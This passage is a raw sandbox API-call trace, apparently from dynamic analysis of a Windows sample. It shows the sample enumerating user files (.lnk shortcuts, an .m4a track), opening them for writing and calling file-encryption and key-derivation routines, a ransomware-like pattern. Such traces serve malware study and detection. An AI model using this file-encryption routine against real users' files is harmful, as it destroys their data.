lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.806] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.806] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.807] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.808] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.808] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.808] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.808] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.808] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.808] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.808] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.808] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.808] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.808] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.808] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.808] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.809] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.809] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.809] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 0x90add8 [0180.810] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.810] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 0x90add8 [0180.811] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.811] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.811] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.811] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.811] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.811] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.811] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.811] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.811] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.811] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.811] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.813] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.819] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.819] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.819] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.819] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.819] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.820] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.820] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.820] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.820] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.820] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.820] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0x90add8 [0180.822] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0x90add8 [0180.822] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.822] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.822] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.822] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.823] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3-ch0vn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.825] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.825] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.825] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.825] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.825] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.825] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3eebe30, ftCreationTime.dwHighDateTime=0x1d5d8ce, ftLastAccessTime.dwLowDateTime=0x63358590, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x63358590, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="3-CH0vN.m4a", cAlternateFileName="")) returned 0x90add8 [0180.827] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.827] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3eebe30, ftCreationTime.dwHighDateTime=0x1d5d8ce, ftLastAccessTime.dwLowDateTime=0x63358590, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x63358590, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="3-CH0vN.m4a", cAlternateFileName="")) returned 0x90add8 [0180.827] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CH0vN.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.829] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0180.829] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.830] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3eebe30, ftCreationTime.dwHighDateTime=0x1d5d8ce, ftLastAccessTime.dwLowDateTime=0x63358590, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x63358590, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="3-CH0vN.m4a", cAlternateFileName="")) returned 0x90af58 [0180.830] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0180.830] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.830] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.830] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0180.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0180.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.830] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0180.832] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0180.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.844] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0180.844] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.844] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.844] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.844] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.844] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.844] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0180.844] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0180.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.844] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.844] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0180.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 